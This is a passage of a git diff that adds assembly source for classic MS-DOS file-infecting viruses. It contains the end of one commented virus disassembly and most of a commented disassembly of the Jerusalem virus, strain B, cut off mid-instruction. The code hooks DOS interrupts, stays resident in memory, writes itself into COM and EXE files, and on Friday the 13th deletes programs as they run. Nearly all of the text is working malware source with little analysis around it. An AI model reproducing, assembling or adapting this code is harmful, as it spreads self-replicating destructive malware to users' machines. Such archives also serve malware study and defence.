MOV DS,AX + MOV ES,BP ; Restore ES + DEC BX + JNZ BP0180 +BP0190: + MOV CX,SPAR07 + REPZ MOVSB + POP AX ; Recover ES + PUSH AX ; Put it back again + ADD AX,10H ; Address past PSP + ADD SPAR05,AX ; Relocate SS + ADD SPAR03,AX ; Relocate ? + MOV AX,SPAR01 + POP DS + POP ES + MOV SS,SPAR05 + MOV SP,SPAR04 + JMP SP_RET + + ; Friday 13th - Delete program + +BP0200: + XOR CX,CX ; No attributes + MOV AX,4301H ; Set file attributes + INT 21H ; DOS service (Set attributes) + MOV AH,41H ; Delete directory entry + INT 21H ; DOS service (Delete entry) + MOV AX,4B00H ; Load and execute program + POPF + JMP INT_21 ; Interrupt 21H + + ; Process load and execute program + +BP0210: + CMP DEL_SW,1 ; Test delete program switch + JZ BP0200 ; Branch to delete if on + MOV F_HAND,-1 ; No file handle + MOV MEM_SW,0 ; Set off memory allocated switch + MOV FPTHOF,DX ; Save pathname offset + MOV FPTHSG,DS ; Save pathname segment + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH DS + PUSH ES + CLD + MOV DI,DX ; Point to file pathname + XOR DL,DL ; Default drive + CMP BYTE PTR [DI+1],3AH ; Test second character for ':' + JNZ BP0220 ; Branch if not + MOV DL,[DI] ; Get drive letter + AND DL,1FH ; Convert to number +BP0220: + MOV AH,36H ; Get disk free space + INT 21H ; DOS service (Get disk free) + CMP AX,-1 ; Test for invalid drive + JNZ BP0240 ; Branch if not +BP0230: + JMP BP0500 ; Terminate + +BP0240: + MUL BX ; Calc number of free sectors + MUL CX ; Calc number of free bytes + OR DX,DX ; Test high word of result + JNZ BP0250 ; Branch if not zero + CMP AX,OFFSET ENDADR ; Length of virus + JB BP0230 ; Terminate if less +BP0250: + MOV DX,FPTHOF ; Get pathname offset + PUSH DS ; \ Set ES to DS + POP ES ; / + XOR AL,AL ; Test character - zero + MOV CX,41H ; Maximum pathname length + REPNZ SCASB ; Find end of pathname + MOV SI,FPTHOF ; Get pathname offset +BP0260: + MOV AL,[SI] ; Get pathname character + OR AL,AL ; Test for a character + JZ BP0280 ; Finish if none + CMP AL,61H ; Test for 'a' + JB BP0270 ; Branch if less + CMP AL,7AH ; Test for 'z' + JA BP0270 ; Branch if above + SUB BYTE PTR [SI],20H ; Convert to uppercase +BP0270: + INC SI ; Address next character + JMP BP0260 ; Process next character + +BP0280: + MOV CX,0BH ; Load length 11 + SUB SI,CX ; Address back by length + MOV DI,OFFSET COM_CM ; 'COMMAND.COM' + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV CX,0BH ; Load length again + REPZ CMPSB ; Compare + JNZ BP0290 ; Continue if not command.com + JMP BP0500 ; Terminate + +BP0290: + MOV AX,4300H ; Get file attributes + INT 21H ; DOS service (Get attributes) + JB BP0300 ; Follow chain of error branches + MOV F_ATTS,CX ; Save file attributes +BP0300: + JB BP0320 ; Follow chain of error branches + XOR AL,AL ; Scan character - zero + MOV EXE_SW,AL ; Set EXE switch off + PUSH DS ; \ Set ES to DS + POP ES ; / + MOV DI,DX ; Pointer to pathname + MOV CX,41H ; Maximum pathname length + REPNZ SCASB ; Find end of pathname + CMP BYTE PTR [DI-2],4DH ; Is last letter 'M' + JZ BP0310 ; Branch if yes + CMP BYTE PTR [DI-2],6DH ; Is last letter 'm' + JZ BP0310 ; Branch if yes + INC EXE_SW ; Set EXE switch on +BP0310: + MOV AX,3D00H ; Open handle, read only + INT 21H ; DOS service (Open handle) +BP0320: + JB BP0340 ; Follow chain of error branches + MOV F_HAND,AX ; Save file handle + MOV BX,AX ; File handle + MOV AX,4202H ; Move file pointer + MOV CX,-1 ; \ End of file minus 5 + MOV DX,-5 ; / + INT 21H ; DOS service (Move pointer) + JB BP0320 ; Follow chain of error branches + ADD AX,5 ; Total file size + MOV F_SIZE,AX ; Save total file size + MOV CX,5 ; Length to read + MOV DX,OFFSET SIGBUF ; Infection test buffer + MOV AX,CS ; \ + MOV DS,AX ; ) Make DS & ES same as CS + MOV ES,AX ; / + ASSUME DS:CODE + MOV AH,3FH ; Read handle + INT 21H ; DOS service (Read handle) + MOV DI,DX ; Address test buffer + MOV SI,OFFSET VR_SIG ; Signature + REPZ CMPSB ; Compare signatures + JNZ BP0330 ; Branch if not infected + MOV AH,3EH ; Close handle + INT 21H ; DOS service (Close handle) + JMP BP0500 ; Terminate + +BP0330: + MOV AX,3524H ; Get interrupt 24H + INT 21H ; DOS service (Get int) + MOV I24OFF,BX ; Save interrupt 24H offset + MOV I24SEG,ES ; Save interrupt 24H segment + MOV DX,OFFSET BP0090 ; Interrupt 24H routine + MOV AX,2524H ; Set interrupt 24H + INT 21H ; DOS service (Set int) + LDS DX,F_PATH ; Address program pathname + XOR CX,CX ; No attributes + MOV AX,4301H ; Set file attributes + INT 21H ; DOS service (Set attributes) + ASSUME DS:NOTHING +BP0340: + JB BP0350 ; Follow chain of error branches + MOV BX,F_HAND ; Get file handle + MOV AH,3EH ; Close handle + INT 21H ; DOS service (Close handle) + MOV F_HAND,-1 ; No file handle + MOV AX,3D02H ; Open handle read/write + INT 21H ; DOS service (Open handle) + JB BP0350 ; Follow chain of error branches + MOV F_HAND,AX ; Save file handle + MOV AX,CS ; \ + MOV DS,AX ; ) Make DS & ES same as CS + MOV ES,AX ; / + ASSUME DS:CODE + MOV BX,F_HAND ; Get file handle + MOV AX,5700H ; Get file date and time + INT 21H ; DOS service (Get file date) + MOV F_DATE,DX ; Save file date + MOV F_TIME,CX ; Save file time + MOV AX,4200H ; Move file pointer + XOR CX,CX ; \ Beginning of file + MOV DX,CX ; / + INT 21H ; DOS service (Move pointer) +BP0350: + JB BP0380 ; Follow chain of error branches + CMP EXE_SW,0 ; Test EXE switch + JZ BP0360 ; Branch if off + JMP BP0400 + + ; .COM file processing + +BP0360: + MOV BX,1000H ; 64K of memory wanted + MOV AH,48H ; Allocate memory + INT 21H ; DOS service (Allocate memory) + JNB BP0370 ; Branch if successful + MOV AH,3EH ; Close handle + MOV BX,F_HAND ; Get file handle + INT 21H ; DOS service (Close handle) + JMP BP0500 ; Terminate + +BP0370: + INC MEM_SW ; Set on memory allocated switch + MOV ES,AX ; Segment of allocated memory + XOR SI,SI ; Start of virus + MOV DI,SI ; Start of allocated memory + MOV CX,OFFSET ENDADR ; Length of virus + REPZ MOVSB ; Copy virus to allocated + MOV DX,DI ; Address after virus + MOV CX,F_SIZE ; Total file size + MOV BX,F_HAND ; Get file handle + PUSH ES ; \ Set DS to ES + POP DS ; / + MOV AH,3FH ; Read handle + INT 21H ; DOS service (Read handle) +BP0380: + JB BP0390 ; Follow chain of error branches + ADD DI,CX ; Add previous file size + XOR CX,CX ; \ Beginning of file + MOV DX,CX ; / + MOV AX,4200H ; Move file pointer + INT 21H ; DOS service (Move pointer) + MOV SI,OFFSET VR_SIG ; Signature + MOV CX,5 ; Length to move + REPZ MOVS [DI],CS:VR_SIG ; Copy signature to end + MOV CX,DI ; Length to write + XOR DX,DX ; Start of allocated + MOV AH,40H ; Write handle + INT 21H ; DOS service (Write handle) +BP0390: + JB BP0410 ; Follow chain of error branches + JMP BP0480 ; Free memory and reset values + + ; .EXE file processing + +BP0400: + MOV CX,1CH ; Length of EXE header + MOV DX,OFFSET EXEHED ; .EXE header store + MOV AH,3FH ; Read handle + INT 21H ; DOS service (Read handle) +BP0410: + JB BP0430 ; Follow chain of error branches + MOV EXHD09,1984H ; Negative checksum + MOV AX,EXHD07 ; \ Store initial stack segment + MOV PRG_SS,AX ; / + MOV AX,EXHD08 ; \ Store initial stack pointer + MOV PRG_SP,AX ; / + MOV AX,EXHD10 ; \ Store initial code offset + MOV PRGOFF,AX ; / + MOV AX,EXHD11 ; \ Store initial code segment + MOV PRGSEG,AX ; / + MOV AX,EXHD02 ; Get size of file in pages + CMP EXHD01,0 ; Number of bytes in last page + JZ BP0420 ; Branch if none + DEC AX ; One less page +BP0420: + MUL BYTSEC ; Bytes per sector + ADD AX,EXHD01 ; \ Add bytes in last page + ADC DX,0 ; / + ADD AX,0FH ; \ Round up + ADC DX,0 ; / + AND AX,0FFF0H ; Clear bottom figure + MOV F_SIZ1,AX ; Save low-order file size + MOV F_SIZ2,DX ; Save high-order file size + ADD AX,OFFSET ENDADR ; \ Add virus length + ADC DX,0 ; / +BP0430: + JB BP0450 ; Follow chain of error branches + DIV BYTSEC ; Bytes per sector + OR DX,DX ; Test odd bytes + JZ BP0440 ; Branch if none + INC AX ; One more page for odd bytes +BP0440: + MOV EXHD02,AX ; Store size of file in pages + MOV EXHD01,DX ; Store bytes in last page + MOV AX,F_SIZ1 ; Low-order file size + MOV DX,F_SIZ2 ; High-order file size + DIV PARAGR ; Size of a paragraph + SUB AX,EXHD04 ; Size of header in paragraphs + MOV EXHD11,AX ; Initial code segment + MOV EXHD10,OFFSET BP0030 ; Initial code offset + MOV EXHD07,AX ; Initial stack segment + MOV EXHD08,OFFSET ENDADR ; Initial stack pointer + XOR CX,CX ; \ Beginning of file + MOV DX,CX ; / + MOV AX,4200H ; Move file pointer + INT 21H ; DOS service (Move pointer) +BP0450: + JB BP0460 ; Follow chain of error branches + MOV CX,1CH ; Length of EXE header + MOV DX,OFFSET EXEHED ; .EXE header store + MOV AH,40H ; Write handle + INT 21H ; DOS service (Write handle) +BP0460: + JB BP0470 ; Follow chain of error branches + CMP AX,CX ; Has same length been written + JNZ BP0480 ; Branch if not + MOV DX,F_SIZ1 ; Low-order file size + MOV CX,F_SIZ2 ; High-order file size + MOV AX,4200H ; Move file pointer + INT 21H ; DOS service (Move pointer) +BP0470: + JB BP0480 ; Follow chain of error branches + XOR DX,DX ; Address beginning of virus + MOV CX,OFFSET ENDADR ; Length of virus + MOV AH,40H ; Write handle + INT 21H ; DOS service (Write handle) + ASSUME DS:NOTHING +BP0480: + CMP MEM_SW,0 ; Test memory allocated switch + JZ BP0490 ; Branch if off + MOV AH,49H ; Free allocated memory + INT 21H ; DOS service (Free memory) +BP0490: + CMP F_HAND,-1 ; Test file handle + JZ BP0500 ; Terminate if none + MOV BX,F_HAND ; Get file handle + MOV DX,F_DATE ; Get file date + MOV CX,F_TIME ; Get file time + MOV AX,5701H ; Set file date and time + INT 21H ; DOS service (Set file date) + MOV AH,3EH ; Close handle + INT 21H ; DOS service (Close handle) + LDS DX,F_PATH ; Address program pathname + MOV CX,F_ATTS ; Load file attributes + MOV AX,4301H ; Set file attributes + INT 21H ; DOS service (Set attributes) + LDS DX,INT_24 ; Original interrupt 24H address + MOV AX,2524H ; Set interrupt 24H + INT 21H ; DOS service (Set int) +BP0500: + POP ES + POP DS + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POPF + JMP INT_21 ; Interrupt 21H + + DB 11 DUP (0) + +ENDKEEP EQU $ + + ; Stack area - rubbish + + DB 04DH, 09BH, 018H, 004H, 000H, 000H, 000H, 000H + DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H + DB 000H, 001H, 000H, 000H, 000H, 000H, 000H, 032H + DB 000H, 000H, 000H, 02FH, 000H, 0FFH, 0FFH, 0FFH + DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH + DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 043H + DB 03AH, 05CH, 041H, 055H, 054H, 04FH, 045H, 058H + DB 045H, 043H, 02EH, 042H, 041H, 054H, 000H, 061H + DB 075H, 074H, 06FH, 065H, 078H, 065H, 063H, 00DH + DB 000H, 0FFH, 0FFH, 0FFH, 000H, 000H, 000H, 000H + DB 04DH, 09BH, 018H, 000H, 010H, 09AH, 0F0H, 0FEH + DB 01DH, 0F0H, 02FH, 001H, 09BH, 018H, 03CH, 001H + DB 0E9H, 092H, 000H, 073H, 055H, 04DH, 073H, 044H + DB 06FH, 073H, 000H, 001H, 026H, 01CH, 000H, 000H + DB 000H, 074H, 02AH, 0ABH, 000H, 0CDH, 017H, 060H + DB 014H, 09FH, 002H, 056H, 005H, 09BH, 018H, 053H + DB 03AH, 000H, 000H, 000H, 000H, 000H, 000H, 000H + DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H + DB 000H, 0B5H, 01BH, 080H, 000H, 000H, 000H, 080H + DB 000H, 0B5H, 01BH, 05CH, 000H, 0B5H, 01BH, 06CH + DB 000H, 0B5H, 01BH, 010H, 007H, 0EDH, 014H, 0C5H + DB 000H, 0EDH, 014H, 046H, 002H, 0A1H, 000H, 04DH + DB 05AH, 0F0H, 000H, 0B2H, 000H, 038H, 001H, 060H + DB 000H, 0D3H, 006H, 0FFH, 0FFH, 05EH, 015H, 010H + DB 007H, 084H, 019H, 0C5H, 000H, 05EH, 015H, 01EH + DB 000H, 000H, 000H, 037H, 020H, 02AH, 02AH, 02AH + DB 005H, 000H, 020H, 000H, 030H, 00FH, 000H, 060H + DB 000H, 002H, 010H, 000H, 0E0H, 05BH, 001H, 000H + DB 0B9H, 041H, 02AH, 09BH, 043H, 04FH, 04DH, 04DH + DB 041H, 04EH, 044H, 02EH, 043H, 04FH, 04DH, 001H + DB 000H, 000H, 000H, 000H, 000H, 0FCH, 0B4H, 0E0H + DB 0CDH, 021H, 080H, 0FCH, 0E0H, 073H, 016H, 080H + DB 0FCH, 003H, 072H, 011H, 0B4H, 0DDH, 0BFH, 000H + DB 001H, 0BEH, 010H, 007H, 003H, 0F7H, 02EH, 08BH + +ENDADR EQU $ + +CODE ENDS + + END START + diff --git a/MSDOS/Virus.MSDOS.Unknown.jerusal.asm b/MSDOS/Virus.MSDOS.Unknown.jerusal.asm new file mode 100644 index 00000000..e0ada054 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jerusal.asm @@ -0,0 +1,720 @@ +PAGE 59,132 + +;***************************************************************************** +; Jerusalem Virus - Strain B +; +; Disassembled and commented by: +; +; - Captain Morgan - +;***************************************************************************** + + +.286c + +data_1e equ 2Ch +data_2e equ 43h +data_3e equ 45h +data_4e equ 47h +data_5e equ 49h +data_6e equ 51h +data_7e equ 53h +data_8e equ 57h +data_9e equ 5Dh +data_10e equ 5Fh +data_11e equ 61h +data_12e equ 63h +data_13e equ 65h +data_14e equ 78h +data_15e equ 7Ah +data_16e equ 7Ch +data_17e equ 7Eh +data_18e equ 0Ah +data_19e equ 0Ch +data_20e equ 0Eh +data_21e equ 0Fh +data_22e equ 11h +data_23e equ 13h +data_24e equ 15h +data_25e equ 17h +data_26e equ 19h +data_27e equ 1Bh +data_28e equ 1Dh +data_29e equ 1Fh +data_30e equ 29h +data_31e equ 2Bh +data_32e equ 2Dh +data_33e equ 2Fh +data_34e equ 31h +data_35e equ 33h +data_36e equ 4Eh +data_37e equ 70h +data_38e equ 72h +data_39e equ 74h +data_40e equ 76h +data_41e equ 7Ah +data_42e equ 80h +data_43e equ 82h +data_44e equ 8Fh + +seg_a segment + assume cs:seg_a, ds:seg_a + + + org 100h + +je proc far + +start: + jmp loc_2 ; (0195) + db 73h, 55h, 4Dh, 73h, 44h, 6Fh + db 73h, 0, 1, 0EBh, 21h, 0 + db 0, 0, 0ABh, 0Bh, 2Ch, 2 + db 70h, 0, 92h, 0Eh, 29h, 1Ah + db 0EBh, 4, 59h, 6Fh, 0A8h + db 7Bh + db 13 dup (0) + db 0E8h, 6, 0D7h, 62h, 21h, 80h + db 0, 0, 0, 80h, 0, 62h + db 21h, 5Ch, 0, 62h, 21h, 6Ch + db 0, 62h, 21h, 10h, 7, 60h + db 5Bh, 0C5h, 0, 60h, 5Bh, 0 + db 0F0h, 6, 0, 4Dh, 5Ah, 30h + db 0, 53h, 0, 1Fh, 0, 20h + db 0, 0, 0, 0FFh, 0FFh, 0B2h + db 9, 10h, 7, 84h, 19h, 0C5h + db 0, 0B2h, 9, 20h, 0, 0 + db 0, 2Eh, 0Dh, 0Ah, 0, 0 + db 5, 0, 20h, 0, 26h, 12h + db 46h, 0A3h, 0, 2, 10h, 0 + db 20h, 9Dh, 0, 0, 7Bh, 3Dh + db 2Eh, 9Bh + db 'COMMAND.COM' + db 1, 0, 0, 0, 0, 0 +loc_2: + cld ; Clear direction + mov ah,0E0h + int 21h ; DOS Services ah=function E0h + cmp ah,0E0h + jae loc_3 ; Jump if above or = + cmp ah,3 + jb loc_3 ; Jump if below + mov ah,0DDh + mov di,100h + mov si,710h + add si,di + mov cx,cs:[di+11h] + nop ;*Fixup for MASM (M) + int 21h ; DOS Services ah=function DDh +loc_3: + mov ax,cs + add ax,10h + mov ss,ax + mov sp,700h +loc_4: + push ax + mov ax,0C5h + push ax + retf ; Return far + db 0FCh, 6, 2Eh, 8Ch, 6, 31h + db 0, 2Eh, 8Ch, 6, 39h, 0 + db 2Eh, 8Ch, 6, 3Dh, 0, 2Eh + db 8Ch, 6, 41h, 0, 8Ch, 0C0h + db 5, 10h, 0, 2Eh, 1, 6 + db 49h, 0, 2Eh, 1, 6, 45h + db 0, 0B4h, 0E0h, 0CDh, 21h, 80h + db 0FCh, 0E0h, 73h, 13h, 80h, 0FCh + db 3, 7, 2Eh, 8Eh, 16h, 45h + db 0, 2Eh, 8Bh, 26h, 43h, 0 + db 2Eh, 0FFh, 2Eh, 47h, 0, 33h + db 0C0h, 8Eh, 0C0h, 26h, 0A1h, 0FCh + db 3, 2Eh, 0A3h, 4Bh, 0, 26h + db 0A0h, 0FEh, 3, 2Eh, 0A2h, 4Dh + db 0 + db 26h + +je endp + +;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ +; +; External Entry Point +; +;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ + +int_24h_entry proc far + mov word ptr ds:[3FCh],0A5F3h + mov byte ptr es:data_47,0CBh + pop ax + add ax,10h + mov es,ax + push cs + pop ds + mov cx,710h + shr cx,1 ; Shift w/zeros fill + xor si,si ; Zero register + mov di,si + push es + mov ax,142h + push ax +;* jmp far ptr loc_1 ;*(0000:03FC) + db 0EAh, 0FCh, 3, 0, 0 + db 8Ch, 0C8h, 8Eh, 0D0h, 0BCh, 0 + db 7, 33h, 0C0h, 8Eh, 0D8h, 2Eh + db 0A1h, 4Bh, 0, 0A3h, 0FCh, 3 + db 2Eh, 0A0h, 4Dh, 0, 0A2h, 0FEh + db 3 +int_24h_entry endp + + +;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ +; +; External Entry Point +; +;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ + +int_21h_entry proc far + mov bx,sp + mov cl,4 + shr bx,cl ; Shift w/zeros fill + add bx,10h + mov cs:data_35e,bx + mov ah,4Ah ; 'J' + mov es,cs:data_34e + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov cs:data_25e,bx + mov cs:data_26e,es + push cs + pop ds + mov dx,25Bh + mov ax,2521h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov es,ds:data_34e + mov es,es:data_1e + xor di,di ; Zero register + mov cx,7FFFh + xor al,al ; Zero register + +locloop_5: + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + cmp es:[di],al + loopnz locloop_5 ; Loop if zf=0, cx>0 + + mov dx,di + add dx,3 + mov ax,4B00h + push es + pop ds + push cs + pop es + mov bx,35h + push ds + push es + push ax + push bx + push cx + push dx + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + mov byte ptr cs:data_20e,0 + cmp cx,7C3h + je loc_7 ; Jump if equal + cmp al,5 ; Check to see if it's Friday + jne loc_6 ; Jump if not equal + cmp dl,0Dh ; Check to see if it's the 13th + jne loc_6 ; Jump if not equal + inc byte ptr cs:data_20e + jmp short loc_7 ; (02F7) + db 90h +loc_6: + mov ax,3508h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov cs:data_23e,bx + mov cs:data_24e,es + push cs + pop ds + mov word ptr ds:data_29e,7E90h + mov ax,2508h + mov dx,21Eh + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx +loc_7: + pop dx + pop cx + pop bx + pop ax + pop es + pop ds + pushf ; Push flags + call dword ptr cs:data_25e + push ds + pop es + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov ah,4Dh ; 'M' + int 21h ; DOS Services ah=function 4Dh + ; get return code info in ax + mov ah,31h ; '1' + mov dx,600h + mov cl,4 + shr dx,cl ; Shift w/zeros fill + add dx,10h + int 21h ; DOS Services ah=function 31h + ; terminate & stay resident + db 32h, 0C0h, 0CFh, 2Eh, 83h, 3Eh + db 1Fh, 0, 2, 75h, 17h, 50h + db 53h, 51h, 52h, 55h, 0B8h, 2 + db 6, 0B7h, 87h, 0B9h, 5, 5 + db 0BAh, 10h, 10h, 0CDh, 10h, 5Dh + db 5Ah, 59h, 5Bh, 58h, 2Eh, 0FFh + db 0Eh, 1Fh, 0, 75h, 12h, 2Eh + db 0C7h, 6, 1Fh, 0, 1, 0 + db 50h, 51h, 56h, 0B9h, 1, 40h + db 0F3h, 0ACh + db 5Eh, 59h, 58h +loc_8: + jmp dword ptr cs:data_23e + db 9Ch, 80h, 0FCh, 0E0h, 75h, 5 + db 0B8h, 0, 3, 9Dh, 0CFh, 80h + db 0FCh, 0DDh, 74h, 13h, 80h, 0FCh + db 0DEh, 74h, 28h, 3Dh, 0, 4Bh + db 75h, 3, 0E9h, 0B4h, 0 +loc_9: + popf ; Pop flags + jmp dword ptr cs:data_25e +loc_10: + pop ax + pop ax + mov ax,100h + mov cs:data_18e,ax + pop ax + mov cs:data_19e,ax + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + popf ; Pop flags + mov ax,cs:data_21e + jmp dword ptr cs:data_18e +loc_11: + add sp,6 + popf ; Pop flags + mov ax,cs + mov ss,ax + mov sp,710h + push es + push es + xor di,di ; Zero register + push cs + pop es + mov cx,10h + mov si,bx + mov di,21h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,ds + mov es,ax + mul word ptr cs:data_41e ; ax = data * ax + add ax,cs:data_31e + adc dx,0 + div word ptr cs:data_41e ; ax,dxrem=dx:ax/data + mov ds,ax + mov si,dx + mov di,dx + mov bp,es + mov bx,cs:data_33e + or bx,bx ; Zero ? + jz loc_13 ; Jump if zero +loc_12: + mov cx,8000h + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + add ax,1000h + add bp,1000h + mov ds,ax + mov es,bp + dec bx + jnz loc_12 ; Jump if not zero +loc_13: + mov cx,cs:data_32e + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop ax + push ax + add ax,10h + add cs:data_30e,ax +data_47 db 2Eh + db 1, 6, 25h, 0, 2Eh, 0A1h + db 21h, 0, 1Fh, 7, 2Eh, 8Eh + db 16h, 29h, 0, 2Eh, 8Bh, 26h + db 27h, 0, 2Eh, 0FFh, 2Eh, 23h + db 0 +loc_14: + xor cx,cx ; Zero register + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + mov ah,41h ; 'A' + int 21h ; DOS Services ah=function 41h + ; delete file, name @ ds:dx + mov ax,4B00h + popf ; Pop flags + jmp dword ptr cs:data_25e +loc_15: + cmp byte ptr cs:data_20e,1 + je loc_14 ; Jump if equal + mov word ptr cs:data_37e,0FFFFh + mov word ptr cs:data_44e,0 + mov cs:data_42e,dx + mov cs:data_43e,ds + push ax + push bx + push cx + push dx + push si + push di + push ds + push es + cld ; Clear direction + mov di,dx + xor dl,dl ; Zero register + cmp byte ptr [di+1],3Ah ; ':' + jne loc_16 ; Jump if not equal + mov dl,[di] + and dl,1Fh +loc_16: + mov ah,36h ; '6' + int 21h ; DOS Services ah=function 36h + ; get free space, drive dl,1=a: + cmp ax,0FFFFh + jne loc_18 ; Jump if not equal +loc_17: + jmp loc_44 ; (06E7) +loc_18: + mul bx ; dx:ax = reg * ax + mul cx ; dx:ax = reg * ax + or dx,dx ; Zero ? + jnz loc_19 ; Jump if not zero + cmp ax,710h + jb loc_17 ; Jump if below +loc_19: + mov dx,cs:data_42e + push ds + pop es + xor al,al ; Zero register + mov cx,41h + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + mov si,cs:data_42e +loc_20: + mov al,[si] + or al,al ; Zero ? + jz loc_22 ; Jump if zero + cmp al,61h ; 'a' + jb loc_21 ; Jump if below + cmp al,7Ah ; 'z' + ja loc_21 ; Jump if above + sub byte ptr [si],20h ; ' ' +loc_21: + inc si + jmp short loc_20 ; (0490) +loc_22: + mov cx,0Bh + sub si,cx + mov di,84h + push cs + pop es + mov cx,0Bh + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jnz loc_23 ; Jump if not zero + jmp loc_44 ; (06E7) +loc_23: + mov ax,4300h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + jc loc_24 ; Jump if carry Set + mov cs:data_38e,cx +loc_24: + jc loc_26 ; Jump if carry Set + xor al,al ; Zero register + mov cs:data_36e,al + push ds + pop es + mov di,dx + mov cx,41h + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + cmp byte ptr [di-2],4Dh ; 'M' + je loc_25 ; Jump if equal + cmp byte ptr [di-2],6Dh ; 'm' + je loc_25 ; Jump if equal + inc byte ptr cs:data_36e +loc_25: + mov ax,3D00h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx +loc_26: + jc loc_28 ; Jump if carry Set + mov cs:data_37e,ax + mov bx,ax + mov ax,4202h + mov cx,0FFFFh + mov dx,0FFFBh + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + jc loc_26 ; Jump if carry Set + add ax,5 + mov cs:data_22e,ax + mov cx,5 + mov dx,6Bh + mov ax,cs + mov ds,ax + mov es,ax + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov di,dx + mov si,5 + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jnz loc_27 ; Jump if not zero + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + jmp loc_44 ; (06E7) +loc_27: + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_27e,bx + mov ds:data_28e,es + mov dx,21Bh + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + lds dx,dword ptr ds:data_42e ; Load 32 bit ptr + xor cx,cx ; Zero register + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx +loc_28: + jc loc_29 ; Jump if carry Set + mov bx,cs:data_37e + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + mov word ptr cs:data_37e,0FFFFh + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_29 ; Jump if carry Set + mov cs:data_37e,ax + mov ax,cs + mov ds,ax + mov es,ax + mov bx,ds:data_37e + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ds:data_39e,dx + mov ds:data_40e,cx + mov ax,4200h + xor cx,cx ; Zero register + mov dx,cx + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset +loc_29: + jc loc_32 ; Jump if carry Set + cmp byte ptr ds:data_36e,0 + je loc_30 ; Jump if equal + jmp short loc_34 ; (05E6) + db 90h +loc_30: + mov bx,1000h + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + jnc loc_31 ; Jump if carry=0 + mov ah,3Eh ; '>' + mov bx,ds:data_37e + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + jmp loc_44 ; (06E7) +loc_31: + inc word ptr ds:data_44e + mov es,ax + xor si,si ; Zero register + mov di,si + mov cx,710h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov dx,di + mov cx,ds:data_22e + mov bx,ds:data_37e + push es + pop ds + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx +loc_32: + jc loc_33 ; Jump if carry Set + add di,cx + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov si,5 + mov cx,5 + rep movs byte ptr es:[di],cs:[si] ; Rep when cx >0 Mov [si] to es:[di] + mov cx,di + xor dx,dx ; Zero register + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +loc_33: + jc loc_35 ; Jump if carry Set + jmp loc_42 ; (06A2) +loc_34: + mov cx,1Ch + mov dx,4Fh + mov ah,3Fh ; '?' + int 21h ; DOS 